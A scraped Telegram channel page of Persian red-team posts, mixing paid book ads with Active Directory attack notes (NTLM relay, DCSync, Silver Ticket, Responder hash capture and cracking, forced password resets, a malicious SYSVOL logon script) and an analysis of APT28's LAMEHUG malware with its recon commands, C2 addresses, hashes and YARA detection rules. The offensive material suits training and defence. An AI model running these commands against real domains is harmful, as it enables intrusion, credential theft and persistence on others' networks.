en
Feedback


Open in Telegram

Red Team ( Network ) , with Kaveh

Show more
977
Subscribers
No data24 hours
+27 days
+130 days
Posts Archive

977
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته 📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers) این کتاب یک ر
+3
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته 📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)  این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می‌ کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیب‌پذیری‌ها، و تکنیک‌های نفوذ می‌ پردازد. محتوای اصلی کتاب شامل فصل‌هایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیک‌های کپچرینگ پکت‌ها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است. این کتاب مناسب چه کسانی است؟ ویژگی‌ های کتاب ؟ چرا باید این کتاب را بخرید؟ دانلود فایل های تمرین و سناریوها نمونه کتاب توضیحات کامل را بخوانید . 💰 قیمت : ۲۵۰,۰۰۰ تومان 📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport


977
photo content


977
ریــا حلال شمــارند و جــام بــاده حرام زهی طریقت و ملت زهی شریعت و کیش ریـای زاهد سالوس جان مــن فرسود قدح بیار و بنه مرهمی بر این دل ریش.        •●حافظ شیرازی●• روز بزرگداشت "حافظ شیرازی"


977
🔖 آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP @KavehAPT


977
آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP این مقاله یک سناریو واقعی از تست نفوذ را نش
آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP این مقاله یک سناریو واقعی از تست نفوذ را نشان می‌دهد که در آن مهاجم پس از دستیابی به دسترسی اولیه به یک سرور،با غیرفعال کردن عمدی سرویس‌ های حیاتی NetLogon، LanManServer و LanManWorkstation، مسیر معمول NTLM Relay از طریق پورت 445 را مسدود می‌ کند. مراحل دقیق حمله: 1. غیرفعال کردن سرویس‌های حیاتی:
sc stop netlogon sc stop lanmanserver sc config lanmanserver start= disabled sc stop lanmanworkstation sc config lanmanworkstation start= disabled
2. تأیید بسته بودن پورت 445:
 nmap -p 445 -sT -Pn <serverIP>
3. راه حل جایگزین - استفاده از Kerberos: ■ استخراج هش‌های NTLM از LSA Secrets با secretsdump.py ■ به دست آوردن Domain SID با lookupsid.py ■ ساخت Silver Ticket با ticketer.py 4. دسترسی به سیستم تارگت: ■ استفاده از atexec-pro.py برای اجرای دستور از راه دور ■ آپلود و اجرای پیلود (msf_win_x64.exe) ⚠️ سلب مسئولیت: این محتوا صرفاً برای اهداف آموزشی و در محیط ‌های لابراتور مجاز ارائه می ‌شود. @KavehAPT


977
🔥 جشن مهرگان یادآور پیروزی کاوه آهنگر و مردم بر ضحاک، نماد ظلم و بیداد است. کاوه آهنگر که از قتل‌عام پسرانش به دست سربازان ض
🔥 جشن مهرگان یادآور پیروزی کاوه آهنگر و مردم بر ضحاک، نماد ظلم و بیداد است. کاوه آهنگر که از قتل‌عام پسرانش به دست سربازان ضحاک رنج می‌برد، به دربار ضحاک آمد و اعتراض کرد. ضحاک که از او ترسیده بود، دستور آزادی آخرین پسر کاوه را داد و خواست او نیز اعتراف به عدالت ضحاک کند، اما کاوه نامه را پاره کرد و با پیشبند چرمی‌اش که نماد مقاومت بود روی نیزه به میان مردم رفت و آنها را به قیام علیه ضحاک فراخواند. کاوه سپس به همراه مردم به نزد فریدون رفت که فریدون، از دودمان پیشدادی، با رهبری خود ضحاک را شکست داد و عدالت و آزادی را برقرار کرد. در فرهنگ ایرانی، کاوه آهنگر نماد آزادی‌خواهی و مقاومت در برابر ظلم، و ضحاک نماد ستم و جور مطرح شده است. پرچمی که کاوه با پیشبند چرمی‌اش بر نیزه بست بعدها به «درفش کاویانی» معروف شد و نماد اتحاد و مبارزه برای حق و آزادی گردید. 💰 ۲۰٪ تخفیف:  ۲۰۰,۰۰۰ تومان برای این کتابها : کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته. ⭕ وایرشارک برای رد‌تیمرها 💢 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport


977
📖 Credential Dumping DCSync Attack حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامه‌ها از کنترل‌کننده دامنه (DC) به‌کار می‌برند، با این روش که خود را شبیه یک کنترل‌کننده دامنه نشان می‌دهند. راه‌اندازی یک محیط آزمایشگاهی برای شبیه ‌سازی حمله درک پروتکل DRS و نحوه عملکرد حمله چرایی وقوع این misconfiguration در دنیای واقعی Exploiting از misconfiguration نگاشت حمله به MITRE ATT&CK Detecting حمله استراتژی ‌های کاهش خطر راه‌اندازی لاب (Lab Setup) نیازمندی‌ها: یک محیط مجازی ‌سازی (مثلاً VMware، VirtualBox یا Hyper-V). یک Windows Server که به‌عنوان کنترل‌کننده دامنه پیکربندی شده باشد. یک ماشین کلاینت ویندوز. ابزارها: Impacket، Mimikatz، Netexec و Metasploit. مراحل: پیکربندی کنترل‌کننده دامنه: ویندوز سرور را نصب و پیکربندی کنید تا به‌عنوان کنترل‌کننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را به‌صورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راه‌اندازی کنید و چند کاربر و گروه ایجاد کنید. @KavehAPT @TryHackBox


977
impacket-ntlmrelayx مهاجم ممکن است از یک NTLM relay برای اجرای عملیات DCSync برای یک کاربر انتخاب‌شده استفاده کند. وقتی یک حساب privileged ناخواسته با IP مهاجم ارتباط برقرار کند، ابزار impacket-ntlm می‌تواند credential را intercept کند. این امکان می‌دهد مهاجم Directory Services replica permission را به حسابی که کنترل آن را دارد اختصاص دهد و به‌شدت سطح دسترسی شبکه را گسترش دهد. شرح فنی و کاری که انجام می‌شود: ntlmrelayx.py از مجموعه Impacket ابزاری است که توانایی رهگیری (relay) تاییدیه‌های NTLM را دارد: وقتی یک کلاینت سعی کند به سرویس مهاجم احراز هویت NTLM کند، ntlmrelayx می‌تواند آن احراز هویت را به سرویس دیگری relay کند تا به‌عنوان آن کاربر عمل کند. برای مثال، اگر سرویس‌های شبکه (مثلاً یک سرور چاپ یا برنامه وب با NTLM) به‌طور اشتباه کانفیگ شده باشند، مهاجم می‌تواند احراز هویت دریافتی از یک کاربر privileged را به DC یا به مکان دیگری relay کند و آن‌جا از آن استفاده کند مثلاً برای تغییر ACE یا افزودن DCSync right. پس از relay موفق، مهاجم می‌تواند با creds relay شده امورات مدیریتی مثل افزودن ACE برای DCSync را انجام دهد. این حمله معمولاً به جزئیات شبکه و دسترسی اولیه نیاز دارد (توانایی ایجاد یک سرویس فریبنده یا انجام poisoning). @KavehAPT


977
impacket-ntlmrelayx مهاجم ممکن است از یک NTLM relay برای اجرای عملیات DCSync برای یک کاربر انتخاب‌شده استفاده کند. وقتی یک حساب privileged ناخواسته با IP مهاجم ارتباط برقرار کند، ابزار impacket-ntlm می‌تواند credential را intercept کند. این امکان می‌دهد مهاجم Directory Services replica permission را به حسابی که کنترل آن را دارد اختصاص دهد و به‌شدت سطح دسترسی شبکه را گسترش دهد.


977
۴. تحلیل رفتاری: الگوهای غیرعادی اجرای دستورات تولید خودکار دستورات سیستمی جمع‌آوری انبوه اطلاعات سیستمی اقدامات حفاظتی اقدامات فوری: ۱. مسدود کردن IoCهای شناخته‌شده (IPها، دامنه‌ها، هش‌ ها) ۲. نظارت بر دسترسی‌ ها به API LLM ۳. تقویت کنترل پیوست‌ های ایمیل ۴. بررسی دایرکتوری %PROGRAMDATA%\info\ اقدامات بلندمدت:
# مسدود کردن API LLM (اگر به طور قانونی استفاده نشود)
netsh advfirewall firewall add rule name="Block_LLM_APIs" 
dir=out action=block remoteip=inference.huggingface.co
نظارت بر پروسس های مشکوک
wevtutil qe Security /q:"*[System[EventID=4688] and 
EventData[Data[@Name='NewProcessName'] and 
(contains(.,'wmic') or contains(.,'systeminfo'))]]"
قوانین YARA برای شناسایی:
rule LAMEHUG_AI_Malware {
    meta:
        description = "شناسایی بدافزار مبتنی بر هوش مصنوعی LAMEHUG"
        author = "تحقیقات امنیتی"
        date = "2025-07-30"
    
    strings:
        $api1 = "inference.huggingface.co"
        $api2 = "Qwen2.5-Coder"
        $path = "%PROGRAMDATA%\\info\\info.txt"
        $cmd1 = "systeminfo >>"
        $cmd2 = "wmic computersystem"
        
    condition:
        2 of them
}
ارزش برای صنعت عصر جدیدی از تهدیدها: LAMEHUG نشان‌ دهنده تغییری اساسی در توسعه بدافزار است. استفاده از LLM برای تولید پویای دستورات، بدافزار را انطباق‌ پذیرتر و سخت‌ تر برای شناسایی می‌کند. ریسک‌های کلیدی: - خودکارسازی حملات پیچیده بدون تخصص - دور زدن سیگنچرهای استاتیک از طریق تولید پویا - کاهش موانع ورود برای مجرمان سایبری - مقیاس‌ پذیری حملات شخصی‌ سازی‌ شده تکامل حفاظت: روش‌های شناسایی سنتی مبتنی بر سیگنچرهای استاتیک، کمتر مؤثر می‌شوند. نیاز به گذار به تحلیل رفتاری و نظارت بر فعالیت هوش مصنوعی وجود دارد. پیش‌بینی‌های توسعه آینده نزدیک: - ادغام LLMهای قدرتمندتر (GPT-4، Claude) - LLMهای محلی برای اجتناب از شاخص‌ های شبکه‌ ای - تولید کد پلی‌ مورفیک توسط هوش مصنوعی - مهندسی اجتماعی خودکار فناوری‌های حفاظتی: - سیستم‌ های شناسایی مبتنی بر هوش مصنوعی - تحلیل رفتاری استفاده از هوش مصنوعی - نظارت و فیلترینگ API LLM - تکنیک‌ های هوش مصنوعی خصمانه نتیجه‌گیری LAMEHUG آغاز عصر جدیدی در امنیت سایبری است. APT28 نشان داد که چگونه هوش مصنوعی می‌تواند برای ایجاد تهدیدهای پیچیده‌تر و انطباق‌پذیرتر سلاح‌ سازی شود. نکات بحرانی: - اولین مورد استفاده جنگی از LLM در بدافزار - تولید پویای دستورات از طریق هوش مصنوعی - کاهش موانع فنی برای مهاجمان - نیاز به بازنگری رویکردهای حفاظتی #APT28 @KavehAPT


977
APT28 LAMEHUG اولین بدافزار مجهز به هوش مصنوعی در طبیعت گروه هکری روس APT28 (Forest Blizzard, UAC-0001) با توسعه اولین بدافزار عمومی مستندشده که از یک مدل زبانی بزرگ (LLM) بهره می‌ برد، دوره جدیدی از حملات سایبری را معرفی کرده است. LAMEHUG فصل جدیدی در تاریخ بدافزارها گشوده است. معماری فنی اجزای اصلی: - زبان برنامه‌نویسی: پایتون - بسته‌بندی: PyInstaller (فایل‌های .pif) - مدل زبانی: Qwen 2.5-Coder-32B-Instruct - رابط برنامه‌نویسی (API): Hugging Face Inference API - روش تحویل: ایمیل‌های فیشینگ حاوی فایل‌های ZIP رویکرد انقلابی: LAMEHUG دستورات متنی به زبان طبیعی را دریافت کرده و از طریق مدل زبانی آن‌ ها را به دستورات سیستمی تبدیل می‌ کند که روی دستگاه آلوده اجرا می‌ شوند. این قابلیت امکان خودکارسازی وظایف پیچیده جاسوسی و سرقت داده‌ها را بدون نیاز به برنامه‌نویسی دستورات خاص فراهم می‌کند. مکانیزم عملکرد مرحله ۱: آلودگی
Appendix.pdf.zip → Appendix.pdf.pif → PyInstaller executable 
مرحله ۲: تولید دستورات توسط هوش مصنوعی بدافزار درخواست‌هایی را به Qwen 2.5-Coder از طریق API Hugging Face ارسال می‌کند: "تولید دستورات ویندوز برای جمع‌وآوری اطلاعات سیستمی شامل سخت‌افزار، پروسس ها، سرویس‌ ها و پیکربندی شبکه" مرحله ۳: اجرای دستورات تولید شده مدل زبانی دستورات آماده را باز می‌ گرداند و LAMEHUG آن‌ ها را از طریق cmd.exe اجرا می‌کند:
cmd.exe /c "mkdir %PROGRAMDATA%\info && 
systeminfo >> %PROGRAMDATA%\info\info.txt && 
wmic computersystem get name,manufacturer,model >> %PROGRAMDATA%\info\info.txt && 
wmic cpu get name,speed >> %PROGRAMDATA%\info\info.txt && 
wmic memorychip get capacity,speed >> %PROGRAMDATA%\info\info.txt && 
wmic diskdrive get model,size >> %PROGRAMDATA%\info\info.txt && 
wmic nic get name,macaddress,ipaddress >> %PROGRAMDATA%\info\info.txt && 
tasklist >> %PROGRAMDATA%\info\info.txt && 
net start >> %PROGRAMDATA%\info\info.txt && 
ipconfig /all >> %PROGRAMDATA%\info\info.txt && 
whoami /user >> %PROGRAMDATA%\info\info.txt && 
whoami /groups >> %PROGRAMDATA%\info\info.txt && 
net config workstation >> %PROGRAMDATA%\info\info.txt && 
dsquery user -samid %username% >> %PROGRAMDATA%\info\info.txt"
مرحله ۴: جمع‌ آوری و استخراج داده‌ ها - جستجوی بازگشتی در پوشه‌ های Documents، Desktop، Downloads - آماده‌ سازی فایل‌ ها برای استخراج - انتقال داده‌ ها از طریق SFTP یا HTTP POST. گونه‌های بدافزار سه نسخه شناسایی شده است: 1. نسخه اصلی (Appendix.pdf.pif) - قابلیت پایه تولید دستورات توسط هوش مصنوعی - جمع‌آوری اطلاعات سیستمی - استخراج داده‌ها از طریق SFTP 2.AI_generator_uncensored_Canvas_PRO_v0.9.exe - قابلیت‌های پیشرفته‌ تر تولید دستورات - روش‌ های جایگزین استخراج داده - دور زدن محدودیت‌ های مدل زبانی 3. image.py - نسخه اسکریپت پایتون - منطق تغییر یافته برای استخراج - احتمالاً نسخه آزمایشی شاخص‌ های فنی
آرتیفکت‌ های فایل:
- %PROGRAMDATA%\info\info.txt 
- اطلاعات سیستمی
- Appendix.pdf.pif 
پیلود اصلی
- AI_generator_uncensored_Canvas_PRO_v0.9.exe
- نسخه جایگزین شاخص‌ های شبکه‌ای:
- سرورهای C2: 144.126.202.227, 192.36.27.37
- دامنه‌ها:
boroda70@meta.ua, stayathomeclasses.com

- API: inference.huggingface.co (Qwen 2.5-Coder)

- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
هش فایل‌ ها:
- 8013b23cb78407675f323d54b6b8dfb2a61fb40fb13309337f5b662dbd812a
- 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777
- a30930dfb655aa39c571c163ada65ba4dec30600df3bf548cc48bedd0e841416
- d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e
- bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3
- 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715
روش‌ های شناسایی 1. نظارت بر فعالیت فایل:
   - Sysmon Event ID 11: 
ایجاد فایل در %PROGRAMDATA%\info\*
   - فایل‌ های مشکوک در دایرکتوری‌ های قابل
نوشتن:
AppData، ProgramData، Users\Public
2. شناسایی جاسوسی:
   - اجرای چندین دستور شناسایی در بازه زمانی کوتاه:
whoami, systeminfo, wmic, ipconfig, net, tasklist
3. نظارت شبکه‌ای:
   - اتصالات به نقاط پایانی API مدل‌های زبانی:
     - inference.huggingface.co
     - api.openai.com
     - generativelanguage.googleapis.com
     - api.anthropic.com`
@KavehAPT


977
دوستان من درحال حاضر دسترسی به سیستم ندارم اگر لابراتور دارید و میتونید این ابزار اجرا کنید بهم پیام بدید یسری قابلیت جدید هم اضافه کردم که بهتره تست بشه هرکس میتونه پیام بده : @Unique_exploitbot


977
💢 روز "بازگشایی آموزشگاها" این روز خجسته را به همه‌ی مردم ايران بزرگ شادباش می‌گویم. به ویژه خانواده‌هایی که دانش آموز از پایه يکم دبستان تا آموزشگاهای بزرگ کشور را دارند. آرزوی آبرومندی ‌و رسیدن به برترین پایه‌های دانشیک و بهترین‌ ها را  آرزو داریم براتون. به مناسبت این روز 50 درصد تخفیف روی کتاب هامون گذاشتیم تا همه دوستان از دانش بهره مند بشوند . 📖 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.توضیحات 💰قیمت ۲۵۰,۰۰۰ تومن 💰قیمت با تخفیف ۱۲۵,۰۰۰ تومن 📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفتهتوضیحات + نمونه کتاب 💰قیمت ۲۵۰,۰۰۰ تومن 💰قیمت با تخفیف ۱۲۵,۰۰۰ تومن 📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport


977
ADKAVEH چیست؟ یک اسکریپت PowerShell برای شناسایی و شبیه‌ سازی حملات در Active Directory است. این ابزار به تیم‌های امنیتی (Red/Blue) امکان بررسی محیط AD، پیدا کردن آسیب‌پذیری‌ ها و شبیه‌ سازی امن حملات رایج را می‌دهد. چرا از ADKAVEH استفاده کنیم: ترکیبی از شناسایی + شبیه‌ سازی حمله در یک اسکریپت واحد. سرعت ارزیابی امنیتی و تمرینات داخلی را افزایش می‌ دهد. تفاوت با PowerView: حوزه کاری: PowerView بیشتر برای reconnaissance (نقشه‌برداری کاربران، گروه‌ها، ACLها) است. ADKAVEH علاوه بر آن ماژول‌ های شبیه‌ سازی حمله دارد (Kerberoast, AS-REP, Password Spray و تست‌ های اختیاری Defender). طراحی: PowerView : ماژول/کتابخانه ADKAVEH : اسکریپت تعاملی با گردش کار و کنترل‌ های عملیاتی. ایمنی: ADKAVEH تأیید و محدودیت نرخ داخلی است. PowerView ایمنی را به استفاده‌کننده واگذار می‌ کند.


977
دوستان این اسکریپت قبلا نوشته بودم حال تغییرات و بهبود پیدا کرده امیدوارم براتون مفید باشه ADKAVEH — اسکریپت تست نفوذ Active Directory — فریم ورک شمارش و حمله روی Active Directory ADKAVEH یک اسکریپت جامع مبتنی بر PowerShell است که برای شمارش (enumeration) Active Directory، ارزیابی آسیب‌پذیری‌ ها و انجام تست‌های نفوذ مجاز طراحی شده است. این ابزار برای متخصصان امنیت، تیم‌های قرمز (Red Teams) و تیم‌های آبی (Blue Teams) ساخته شده و امکانات تعاملی‌ ای فراهم می‌کند تا بردارهای حمله‌ ی مرسوم در AD را شناسایی کنند، در حالی که امنیت عملیاتی را نیز حفظ می‌کند. https://github.com/TryHackBox/ADKAVEH #tools @KavehAPT


977
⭕️ یادداشت‌ های اکسپلویت از تست نفوذ Active Directory - بخش پایانی حمله Force Change Password Attack اگر برخی نام کاربری/رمز عبور و نام‌ های کاربری دیگر را پیدا کردیم، ممکن است بتوانیم رمز عبور کاربران دیگر را تغییر دهیم. کاربر نیاز به مجوز GenericAll برای تغییر رمز عبور کاربران دیگر دارد.
# -U: User credential who has the permission to change another user password
# -I: Target IP
# -S: Target server name
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"
Microsoft Management Console (mmc) برای تنظیم AD، این دستورالعمل‌ها را دنبال کنید: ۱. روی آیکون ویندوز راست‌ کلیک کنید. ۲. روی "Run" کلیک کنید و "mmc" را وارد کنید سپس "OK" را کلیک کنید. ۳. در MMC، روی "File → Add or Remove Snap-ins" کلیک کنید. ۴. تمام سه "Active Directory…" snap-in را اضافه کنید. ۵. روی "Active Directory…" در پنل سمت چپ راست‌کلیک کنید و "Change Forest" را انتخاب کنید. ۶. دامنه را به عنوان Root domain وارد کنید و OK را کلیک کنید. ۷. روی "View → Advanced Features" کلیک کنید. قرارداد نام‌ گذاری (Naming Convention) اگر فهرست نام‌ های کاربری در Active Directory را پیدا کردیم، می‌توانیم نام‌ های کاربری را با قرارداد نام‌ گذاری تغییر دهیم. برای مثال:
john smith -> jsmith, j.smith, john.smith
michael pole -> mpole, m.pole, michael.pole
ssh dc.example.com\\<ad_username>@sub.dc.example.com
تزریق اعتبارنامه‌ ها به حافظه (Inject Credentials into Memory)
# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe
پیکربندی DNS (DNS Configuration)
# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
حالا بررسی کنید که پیکربندی به درستی تنظیم شده است. دانش پایه (Basic Knowledge) مدیریت کاربر (User Management) (Delegation) در Active Directory، مدیر می‌تواند کاربر دیگری را برای مدیریت کاربران در یک واحد سازمانی (OU) Delegation کند، بدون privileges مدیر. تنظیم (Setup) "Active Directory Users and Computers" را باز کنید. روی OU تارگت راست‌ کلیک کنید و روی “Delegate Control…” کلیک کنید. سپس پنجره جدید باز می‌شود. در پنجره، نام کاربری که می‌خواهید privilege مدیریت کاربران را به او Delegation کنید، وارد کنید. وظایفی را که کاربر واگذارشده(Delegation) باید مدیریت کند، انتخاب کنید. OK را کلیک کنید. مدیریت کاربران (Manage Users) به عنوان کاربر واگذارشده وارد شوید. برای مثال، اگر می‌خواهید رمز عبور john را بازنشانی کنید، دستور زیر را در PowerShell اجرا کنید. سپس رمز عبور جدید را در پرامپت وارد کنید.
Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
اولین باری که John پس از آن وارد سیستم می‌شود، می‌خواهیم John رمز عبور دلخواه خود را تغییر دهد نه رمزی که شما وارد کردید. برای این کار، دستور زیر را اجرا کنید.
Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
حالا وقتی John وارد سیستم می‌شود، از او خواسته می‌شود رمز عبور جدیدی تغییر دهد. رهگیری احراز هویت NetNTLM (Intercept NetNTLM Authentication) Responder را شروع کنید تا برای هر درخواست LLMNR، NBT-NS، WPAD گوش کند.
sudo responder -I <interface-like-eth0>
Responder را تا دریافت برخی درخواست‌ها در حال اجرا نگه دارید. اگر هش NTLM را دریافت کردید، آن را در ماشین محلی کرک کنید.
echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt
#NoteADExploit @KavehAPT


977
به مناسبت اینکه دیروز روز برنامه نویس بوده و این پیام با تاخیر ارسال شده . 📌 ۲۲ شهریور  روز جهانی برنامه‌ نویسان به همین مناسبت، فقط به مدت چهار ساعت آینده روی محصولات آموزشی ما ۲۰٪ تخفیف ویژه اعمال شده است. 📖 کتابچه آموزشی: "Mimikatz – تسلط عملی بر تکنیک‌ های پیشرفته حملات Active Directory" 🔹 سطح: مقدماتی تا پیشرفته 💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان 💳 قیمت با تخفیف: ۲۰۰,۰۰۰ تومان 🔗 توضیحات 📖 کتاب آموزشی: "وایرشارک برای ردتیمرها: از پایه تا پیشرفته" 💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان 💳 قیمت با تخفیف: ۲۰۰,۰۰۰ تومان 🔗 توضیحات ⏳ فرصت استفاده از تخفیف محدود است! ➖➖➖➖➖➖➖ 📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: 🆔 @THBxSupport


977
یادداشت‌ های اکسپلویت از تست نفوذ Active Directory - بخش دوم    3. آپلود داده‌ های جمع‌آوری‌ شده (Upload Collected Data)  پس از اجرا، فایل‌های نتیجه (*.json) در دایرکتوری فعلی تولید می‌ شوند. تمام این فایل‌های JSON را به BloodHound در مرورگر وب آپلود کنید.  می‌توانیم روابط در Active Directory را کاوش کنیم. بررسی (Investigation) فهرست همه کاربران
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A
فهرست همه گروه‌ها
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com
فهرست سیاست رمز عبور
net accounts /domain
# فهرست اشیاء AD
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com
بازیابی اطلاعات در مورد دامنه داده‌ شده.
Get-ADDomain -Server dc.example.com
تغییر رمز عبور کاربر AD
Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL 

یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره می‌ کند.

dir \\dc.example.com\SYSVOL\
سوءاستفاده از اسکریپت ورود برای کاربران دیگر (Abuse Logon Script for Other Users) اگر کاربر فعلی مجوز نوشتن اسکریپت‌ ها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت ورود کاربران دیگر را تغییر دهیم. 1. بررسی مجوز
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\
2. تغییر/اضافه کردن یک اسکریپت مخرب
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat
3. تنظیم اسکریپت ورود برای کاربر مشخص‌شده
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat
هنگامی که کاربر دیگر وارد سیستم می‌ شود، اسکریپت .bat اجرا خواهد شد. #NoteADExploit @KavehAPT